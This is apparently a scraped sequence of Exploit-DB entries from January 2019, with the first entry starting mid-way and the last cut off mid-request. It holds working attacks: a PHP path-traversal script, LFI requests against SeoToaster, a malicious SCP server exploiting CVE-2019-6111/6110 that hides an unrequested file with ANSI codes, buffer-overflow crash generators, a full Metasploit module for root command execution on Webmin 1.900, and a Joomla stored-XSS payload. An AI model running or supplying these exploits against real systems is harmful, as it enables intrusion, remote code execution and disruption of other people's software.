Content-Length: 1535
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<?php
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/ExploitDb/release_2016.9/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../";
$url = file_get_contents($url);
$l = json_decode($url, true);
if($l){
echo "*-----------------------------*<br />";
foreach($l['files'] as $u){
echo "[-] Name:" .$u['name']." / Size:" .$u['size']."<br />";
}
echo "*-----------------------------*";}
?>
*-----------------------------*
[-] Name:ErrorPage.php / Size:1911
[-] Name:FootContainer.php / Size:968
[-] Name:Global.php / Size:11020
[-] Name:LICENSE.md / Size:36552
[-] Name:MainContainer.php / Size:4365
[-] Name:MarqueeContainer.php / Size:2394
[-] Name:MenuContainer.php / Size:1782
[-] Name:NavCont.php / Size:387
[-] Name:ProgramsContainer.php / Size:5869
[-] Name:README.md / Size:286
[-] Name:SecondairyContainer.php / Size:5169
[-] Name:Themes.php / Size:6830
[-] Name:TopContainer.php / Size:1378
[-] Name:a.php / Size:119
[-] Name:admin(renamed).php / Size:23841
[-] Name:animated_favicon.gif / Size:21501
[-] Name:cache.php / Size:2385
[-] Name:config.php / Size:997
[-] Name:favicon.ico / Size:4286
[-] Name:friendly.php / Size:2047
[-] Name:gadget.php / Size:2864
[-] Name:includes.php / Size:1575
[-] Name:index.php / Size:7343
[-] Name:l.php / Size:119
*-----------------------------*
# Exploit Title: SeoToaster Ecommerce 3.0.0 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-17
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.seotoaster.com/shopping-cart/
# Software Link: https://www.seotoaster.com/downloads/seotoaster.v3.0.0.zip
# Version: 3.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# /* `exploitdb`.`user` */
# $user = array(
# array('id' => '1','role_id' => 'superadmin','password' => '21232f297a57a5a743894a0e4a801fc3','email' =>....
# array('id' => '2','role_id' => 'sales person','password' => 'b2e790a52146d5ec2f635c6bc699da91','email' =>....
# array('id' => '3','role_id' => 'copywriter','password' => 'd2af88cb19d3db3375266b63bfe8c55c','email' =>....
# );
# Tested role_id : sales person,copywriter
# POC:
# 1)
# http://localhost/[PATH]/backend/backend_theme/editcss/
#
POST /[PATH]/backend/backend_theme/editcss/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: hideAdminPanel=0; currSectionOpen=0; PHPSESSID=0u6ftq75vn79fs3512mli59jo3; mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D; back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3Asettings
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
getcss=../index.php: undefined
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 17:11:17 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.0.32
X-Powered-By: PHP/7.0.32
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2109
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
# POC:
# 2)
# http://localhost/[PATH]/backend/backend_theme/editjs/
#
POST /[PATH]/backend/backend_theme/editjs/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Cookie: hideAdminPanel=0; currSectionOpen=0; PHPSESSID=0u6ftq75vn79fs3512mli59jo3; mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D; back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3Asettings
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
getjs=../index.php: undefined
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 17:11:41 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.0.32
X-Powered-By: PHP/7.0.32
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2109
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/json
# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation
# Date: 1/16/19
# Exploit Author: Chris Anastasio
# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/
# Software Link: Vulnerable Versions included in repo
# Version:
ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729
Vsmon version: 15.3.58.17668
Driver version: 15.1.29.17237
Antivirus engine version: 8.8.1.110
Antivirus signature DAT file version: 1297458144
# Tested on: Windows 7/Windows 10
# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46189.zip
# Exploit Title: SSHtranger Things
# Date: 2019-01-17
# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>
# Vendor Homepage: https://www.openssh.com/
# Software Link: [download link if available]
# Version: OpenSSH 7.6p1
# Tested on: Ubuntu 18.04.1 LTS
# CVE : CVE-2019-6111, CVE-2019-6110
'''
Title: SSHtranger Things
Author: Mark E. Haase <mhaase@hyperiongray.com>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`
package.
The server listens on port 2222. It accepts any username and password, and it
generates a new host key every time you run it.
$ python3 sshtranger_things.py
Download a file using a vulnerable client. The local path must be a dot:
$ scp -P 2222 foo@localhost:test.txt .
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
foo@localhost's password:
test.txt 100% 32 0.7KB/s 00:00
The file you requested (e.g. test.txt) will be saved in your current directory.
If your client is vulnerable, you will have an additional file "exploit.txt"
created in your current directory.
$ cat test.txt
This is the file you requested.
$ cat exploit.txt
SSHtranger Things
The interesting code is in ScpServer.send_file().
'''
import base64
import gzip
import logging
import paramiko
import paramiko.rsakey
import socket
import threading
logging.basicConfig(level=logging.INFO)
dummy = 'This is the file you requested.\n'
payload = gzip.decompress(base64.b64decode(
b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'
b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'
b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'
b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'
b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'
b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'
b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'
b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'
b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'
b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'
))
class ScpServer(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_auth_password(self, username, password):
logging.info('Authenticated with %s:%s', username, password)
return paramiko.AUTH_SUCCESSFUL
def check_channel_request(self, kind, chanid):
logging.info('Opened session channel %d', chanid)
if kind == "session":
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_exec_request(self, channel, command):
command = command.decode('ascii')
logging.info('Approving exec request: %s', command)
parts = command.split(' ')
# Make sure that this is a request to get a file:
assert parts[0] == 'scp'
assert '-f' in parts
file = parts[-1]
# Send file from a new thread.
threading.Thread(target=self.send_file, args=(channel, file)).start()
return True
def send_file(self, channel, file):
'''
The meat of the exploit:
1. Send the requested file.
2. Send another file (exploit.txt) that was not requested.
3. Print ANSI escape sequences to stderr to hide the transfer of
exploit.txt.
'''
def wait_ok():
assert channel.recv(1024) == b'\x00'
def send_ok():
channel.sendall(b'\x00')
wait_ok()
logging.info('Sending requested file "%s" to channel %d', file,
channel.get_id())
command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(dummy)
send_ok()
wait_ok()
# This is CVE-2019-6111: whatever file the client requested, we send
# them 'exploit.txt' instead.
logging.info('Sending malicious file "exploit.txt" to channel %d',
channel.get_id())
command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(payload)
send_ok()
wait_ok()
# This is CVE-2019-6110: the client will display the text that we send
# to stderr, even if it contains ANSI escape sequences. We can send
# ANSI codes that clear the current line to hide the fact that a second
# file was transmitted..
logging.info('Covering our tracks by sending ANSI escape sequence')
channel.sendall_stderr("\x1b[1A".encode('ascii'))
channel.close()
def main():
logging.info('Creating a temporary RSA host key...')
host_key = paramiko.rsakey.RSAKey.generate(1024)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 2222))
sock.listen(0)
logging.info('Listening on port 2222...')
while True:
client, addr = sock.accept()
logging.info('Received connection from %s:%s', *addr)
transport = paramiko.Transport(client)
transport.add_server_key(host_key)
server = ScpServer()
transport.start_server(server=server)
if __name__ == '__main__':
main()
# Exploit Title: Eco Search 1.0.2.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9N05DCQP5C3W
# Version: 1.0.2.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 950
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: 7 Tik 1.0.1.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NQL2QC8S935
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Go to search page
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 7700
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Watchr 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9PN12GNX62VZ
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "watchr.txt"
# Copy the text from the generated watchr.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 8145
payload = buffer
try:
f=open("watchr.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: One Search 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9PMR5QNS5LTL
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 950
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin 1.900 - Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in Webmin
1.900 and lower versions. Any user authorized to the "Java file manager"
and "Upload and Download" fields, to execute arbitrary commands with root privileges.
In addition, "Running Processes" field must be authorized to discover the directory to be uploaded.
A vulnerable file can be printed on the original files of the Webmin application.
The vulberable file we are uploading should be integrated with the application.
Therefore, a ".cgi" file with the vulnerability belong to webmin application should be used.
The module has been tested successfully with Webmin 1900 over Debian 4.9.18.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Webmin <= 1.900', { }]],
'DisclosureDate' => 'Jan 17 2019',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password'])
], self.class)
end
##
# Target and input verification
##
def check
peer = "#{rhost}:#{rport}"
vprint_status("Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.get_cookies =~ /sid/
vprint_good "Login successful"
session = res.get_cookies.split("sid=")[1].split(";")[0]
else
vprint_error "Service found, but login failed"
return Exploit::CheckCode::Detected
end
vprint_status("Attempting to execute...")
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
##
# Exploiting phase
##
def exploit
peer = "#{rhost}:#{rport}"
print_status("Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.get_cookies =~ /sid/
session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "Login successfully"
else
print_error "Authentication failed"
return
end
else
print_error "Authentication failed"
return
end
##
# Directory and SSL verification for referer
##
ps = "#{datastore['SSL']}"
if ps == "true"
ssl = "https://"
else
ssl = "http://"
end
print_status("Target URL => #{ssl}#{peer}")
res1 = send_request_raw(
{
'method' => "POST",
'uri' => "/proc/index_tree.cgi?",
'headers' =>
{
'Referer' => "#{ssl}#{peer}/sysinfo.cgi?xnavigation=1",
},
'cookie' => "redirect=1; testing=1; sid=#{session}"
})
if res1 and res1.code == 200 and res1.body =~ /Running Processes/
print_status "Searching for directory to upload..."
stpdir = res1.body.scan(/perl.+miniserv.pl/).map{ |s| s.split("perl ").last }.map{ |d| d.split("miniserv").first }.map{ |d| d.split("miniserv").first }
dir = stpdir[0] + "file"
print_good("Directory to upload => #{dir}")
else
print_error "No access to processes or no upload directory found."
return
end
##
# Loading phase of the vulnerable file
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data2 = "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"upload0\"; filename=\"show.cgi\"\r\n"
data2 << "Content-Type: application/octet-stream\r\n\r\n"
data2 << "#!/usr/local/bin/perl\n# show.cgi\n# Output some file for the browser\n\n"
data2 << "$trust_unknown_referers = 1;\nrequire './file-lib.pl';\n&ReadParse();\nuse POSIX;\n"
data2 << "$p = $ENV{'PATH_INFO'};\nif ($in{'type'}) {\n\t# Use the supplied content type\n\t"
data2 << "$type = $in{'type'};\n\t$download = 1;\n\t}\nelsif ($in{'format'} == 1) {\n\t"
data2 << "# Type comes from compression format\n\t$type = \"application/zip\";\n\t}\n"
data2 << "elsif ($in{'format'} == 2) {\n\t$type = \"application/x-gzip\";\n\t}\n"
data2 << "elsif ($in{'format'} == 3) {\n\t$type = \"application/x-tar\";\n\t}\nelse {\n\t"
data2 << "# Try to guess type from filename\n\t$type = &guess_mime_type($p, undef);\n\t"
data2 << "if (!$type) {\n\t\t# No idea .. use the 'file' command\n\t\t"
data2 << "$out = &backquote_command(\"file \".\n\t\t\t\t\t quotemeta(&resolve_links($p)), 1);\n\t\t"
data2 << "if ($out =~ /text|script/) {\n\t\t\t$type = \"text/plain\";\n\t\t\t}\n\t\telse {\n\t\t\t"
data2 << "$type = \"application/unknown\";\n\t\t\t}\n\t\t}\n\t}\n\n# Dump the file\n&switch_acl_uid();\n"
data2 << "$temp = &transname();\nif (!&can_access($p)) {\n\t# ACL rules prevent access to file\n\t"
data2 << "&error_exit(&text('view_eaccess', &html_escape($p)));\n\t}\n$p = &unmake_chroot($p);\n\n"
data2 << "if ($in{'format'}) {\n\t# An archive of a directory was requested .. create it\n\t"
data2 << "$archive || &error_exit($text{'view_earchive'});\n\tif ($in{'format'} == 1) {\n\t\t"
data2 << "$p =~ s/\\.zip$//;\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t$p =~ s/\\.tgz$//;\n\t\t}\n\t"
data2 << "elsif ($in{'format'} == 3) {\n\t\t$p =~ s/\\.tar$//;\n\t\t}\n\t-d $p || &error_exit($text{'view_edir'}.\" \".&html_escape($p));\n\t"
data2 << "if ($archive == 2 && $archmax > 0) {\n\t\t# Check if directory is too large to archive\n\t\tlocal $kb = &disk_usage_kb($p);\n\t\t"
data2 << "if ($kb*1024 > $archmax) {\n\t\t\t&error_exit(&text('view_earchmax', $archmax));\n\t\t\t}\n\t\t}\n\n\t"
data2 << "# Work out the base directory and filename\n\tif ($p =~ /^(.*\\/)([^\\/]+)$/) {\n\t\t$pdir = $1;\n\t\t"
data2 << "$pfile = $2;\n\t\t}\n\telse {\n\t\t$pdir = \"/\";\n\t\t$pfile = $p;\n\t\t}\n\n\t"
data2 << "# Work out the command to run\n\tif ($in{'format'} == 1) {\n\t\t"
data2 << "&has_command(\"zip\") || &error_exit(&text('view_ecmd', \"zip\"));\n\t\t"
data2 << "$cmd = \"zip -r $temp \".quotemeta($pfile);\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t"
data2 << "&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t"
data2 << "&has_command(\"gzip\") || &error_exit(&text('view_ecmd', \"gzip\"));\n\t\t"
data2 << "$cmd = \"tar cf - \".quotemeta($pfile).\" | gzip -c >$temp\";\n\t\t}\n\t"
data2 << "elsif ($in{'format'} == 3) {\n\t\t&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t"
data2 << "$cmd = \"tar cf $temp \".quotemeta($pfile);\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t"
data2 << "# Don't actually do anything if in test mode\n\t\t&ok_exit();\n\t\t}\n\n\t"
data2 << "# Run the command, and send back the resulting file\n\tlocal $qpdir = quotemeta($pdir);\n\t"
data2 << "local $out = `cd $qpdir ; ($cmd) 2>&1 </dev/null`;\n\tif ($?) {\n\t\tunlink($temp);\n\t\t"
data2 << "&error_exit(&text('view_ecomp', &html_escape($out)));\n\t\t}\n\tlocal @st = stat($temp);\n\t"
data2 << "print \"Content-length: $st[7]\\n\";\n\tprint \"Content-type: $type\\n\\n\";\n\t"
data2 << "open(FILE, $temp);\n\tunlink($temp);\n\twhile(read(FILE, $buf, 1024)) {\n\t\tprint $buf;\n\t\t}\n\t"
data2 << "close(FILE);\n\t}\nelse {\n\tif (!open(FILE, $p)) {\n\t\t# Unix permissions prevent access\n\t\t"
data2 << "&error_exit(&text('view_eopen', $p, $!));\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t"
data2 << "# Don't actually do anything if in test mode\n\t\tclose(FILE);\n\t\t"
data2 << "&ok_exit();\n\t\t}\n\n\t@st = stat($p);\n\tprint \"X-no-links: 1\\n\";\n\t"
data2 << "print \"Content-length: $st[7]\\n\";\n\tprint \"Content-Disposition: Attachment\\n\" if ($download);\n\t"
data2 << "print \"Content-type: $type\\n\\n\";\n\tif ($type =~ /^text\\/html/i && !$in{'edit'}) {\n\t\t"
data2 << "while(read(FILE, $buf, 1024)) {\n\t\t\t$data .= $buf;\n\t\t\t}\n\t\tprint &filter_javascript($data);\n\t\t"
data2 << "}\n\telse {\n\t\twhile(read(FILE, $buf, 1024)) {\n\t\t\tprint $buf;\n\t\t\t}\n\t\t}\n\tclose(FILE);\n\t}\n\n"
data2 << "sub error_exit\n{\nprint \"Content-type: text/plain\\n\";\n"
data2 << "print \"Content-length: \",length($_[0]),\"\\n\\n\";\nprint $_[0];\nexit;\n}\n\n"
data2 << "sub ok_exit\n{\nprint \"Content-type: text/plain\\n\\n\";\nprint \"\\n\";\nexit;\n}"
data2 << "\r\n\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n#{dir}\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"user\"\r\n\r\nroot\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"group_def\"\r\n\r\n1\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"group\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"zip\"\r\n\r\n0\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"email_def\"\r\n\r\n1\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"ok\"\r\n\r\nUpload\r\n"
data2 << "-----------------------------{boundary}--\r\n"
res2 = send_request_raw(
{
'method' => "POST",
'uri' => "/updown/upload.cgi?id=154739243511",
'data' => data2,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => "#{ssl}#{peer}/updown/?xnavigation=1",
},
'cookie' => "redirect=1; testing=1; sid=#{session}"
})
if res2 and res2.code == 200 and res2.body =~ /Saving file/
print_good "Vulnerable show.cgi file was successfully uploaded."
else
print_error "Upload failed."
return
end
##
# Command execution and shell retrieval
##
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
print_good "Payload executed successfully"
else
print_error "Error executing the payload"
return
end
end
end
# Exploit Title: [Joomla Global Configuration Text Filter settings Stored XSS Vulnerability]
# Date: [18/01/2019]
# Exploit Author: [Praveen Sutar] , Twitter: @praveensutar123
# Vendor Homepage: [https://www.joomla.org/]
# Affected Versions: [Joomla versions 2.5.0 through 3.9.1]
# Tested on: [Joomla 3.9.1]
# CVE : [CVE-2019-6263]
# Vendor Advisory: [https://developer.joomla.org/security-centre/762-20190103-core-stored-xss-issue-in-the-global-configuration-textfilter-settings]
# Author Blog: [http://awesomehackers.org/2019/01/18/cve-2019-6263-joomla-exploit-poc/]
==================
#Product:-
==================
The Flexible Platform Empowering Website Creators. Joomla! is an award-winning content management system (CMS), which enables you to build web sites and powerful online applications.
==================
#Vulnerability:-
==================
Joomla Core - Stored XSS issue in the Global Configuration textfilter settings.
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Joomla Core - Stored XSS issue in the Global Configuration textfilter settings (CVE-2019-6263)
=====================================================================================================================================================
Joomla failes to perform adequate checks at the Global Configuration Text Filter settings which allows a stored XSS.
#Proof-Of-Concept:
------------------
1. Login to Joomla administrator console
2. Navigate to System -> Global Configuration -> Text Filters
3. Add following payload in Filter Tags2 with No HTML (Filter Type) as Public (Filter Group):
jform[filters][1][filter_tags]=ss"><img+src=+xx+onerror=alert(7575)><
==========
Request :
==========
POST /administrator/index.php?option=com_config HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<target_ip>/administrator/index.php?option=com_config
Content-Type: application/x-www-form-urlencoded
Content-Length: 4303
Connection: close
Cookie: wp-settings-time-1=1540363679; 05e3b315128406acf7dd996046a180f8=__SITE__; 7bb05cf41807f1d0136fbae285e8a16c=1; 783fff54c324d89891f303b51230c499=vnrnl8bo3u62d25ak8tqbruhs2
Upgrade-Insecure-Requests: 1
jform%5Bsitename%5D=testjoomla&jform%5Boffline%5D=0&jform%5Bdisplay_offline_message%5D=1&jform%5Boffline_message%5D=This+site+is+down+for+maintenance.%3Cbr+%2F%3EPlease+check+back+again+soon.&jform%5Boffline_image%5D=&jform%5Bfrontediting%5D=1&jform%5Beditor%5D=tinymce&jform%5Bcaptcha%5D=0&jform%5Baccess%5D=1&jform%5Blist_limit%5D=20&jform%5Bfeed_limit%5D=10&jform%5Bfeed_email%5D=none&jform%5BMetaDesc%5D=adsadsa&jform%5BMetaKeys%5D=&jform%5Brobots%5D=&jform%5BMetaRights%5D=&jform%5BMetaAuthor%5D=1&jform%5BMetaVersion%5D=0&jform%5Bsef%5D=1&jform%5Bsef_rewrite%5D=0&jform%5Bsef_suffix%5D=0&jform%5Bunicodeslugs%5D=0&jform%5Bsitename_pagetitles%5D=0&jform%5Bcookie_domain%5D=&jform%5Bcookie_path%5D=&jform%5Blog_path%5D=%2Fvar%2Fwww%2Fhtml%2Fadministrator%2Flogs&jform%5Bhelpurl%5D=https%3A%2F%2Fhelp.joomla.org%2Fproxy%3Fkeyref%3DHelp%7Bmajor%7D%7Bminor%7D%3A%7Bkeyref%7D%26lang%3D%7Blangcode%7D&jform%5Bdebug%5D=0&jform%5Bdebug_lang%5D=0&jform%5Bdebug_lang_const%5D=1&jform%5Bcache_handler%5D=file&jform%5Bcache_path%5D=&jform%5Bmemcache_persist%5D=1&jform%5Bmemcache_compress%5D=0&jform%5Bmemcache_server_host%5D=localhost&jform%5Bmemcache_server_port%5D=11211&jform%5Bmemcached_persist%5D=1&jform%5Bmemcached_compress%5D=0&jform%5Bmemcached_server_host%5D=localhost&jform%5Bmemcached_server_port%5D=11211&jform%5Bredis_persist%5D=1&jform%5Bredis_server_host%5D=localhost&jform%5Bredis_server_port%5D=6379&jform%5Bredis_server_auth%5D=&jform%5Bredis_server_db%5D=0&jform%5Bcachetime%5D=15&jform%5Bcache_platformprefix%5D=0&jform%5Bcaching%5D=0&jform%5Bsession_handler%5D=database&jform%5Bsession_memcache_server_host%5D=localhost&jform%5Bsession_memcache_server_port%5D=11211&jform%5Bsession_memcached_server_host%5D=localhost&jform%5Bsession_memcached_server_port%5D=11211&jform%5Bsession_redis_persist%5D=1&jform%5Bsession_redis_server_host%5D=localhost&jform%5Bsession_redis_server_port%5D=6379&jform%5Bsession_redis_server_auth%5D=&jform%5Bsession_redis_server_db%5D=0&jform%5Blifetime%5D=15&jform%5Bshared_session%5D=0&jform%5Btmp_path%5D=%2Fvar%2Fwww%2Fhtml%2Ftmp&jform%5Bgzip%5D=0&jform%5Berror_reporting%5D=default&jform%5Bforce_ssl%5D=0&jform%5Boffset%5D=UTC&jf